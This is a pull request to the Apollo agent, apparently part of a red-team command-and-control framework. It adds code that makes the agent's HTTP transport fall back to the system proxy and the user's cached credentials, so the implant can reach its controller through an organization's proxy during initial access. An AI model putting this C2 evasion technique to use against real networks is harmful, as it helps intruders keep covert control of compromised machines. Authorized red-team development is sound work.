### PR TITLE
Allow agent to get system proxy and cached credentials if unknown

### DIFF
--- a/Payload_Type/apollo/agent_code/HttpProfile/HttpProfile.cs
+++ b/Payload_Type/apollo/agent_code/HttpProfile/HttpProfile.cs
@@ -154,6 +154,10 @@ namespace HttpTransport
                     UseDefaultCredentials = false,
                     BypassProxyOnLocal = false
                 };
+            } else {
+                // Use Default Proxy and Cached Credentials for Internet Access
+                webClient.Proxy = WebRequest.GetSystemProxy();
+                webClient.Proxy.Credentials = CredentialCache.DefaultCredentials;
             }
             
             foreach(string k in _additionalHeaders.Keys)


### PR DESCRIPTION
An operator will not always know the credentials needed for communications through an organization's proxy. The code below gets the system proxy and cached credentials if ProxyHost, ProxyUser, and ProxyPass are null. This will allow the agent to traverse the proxy if used for initial access.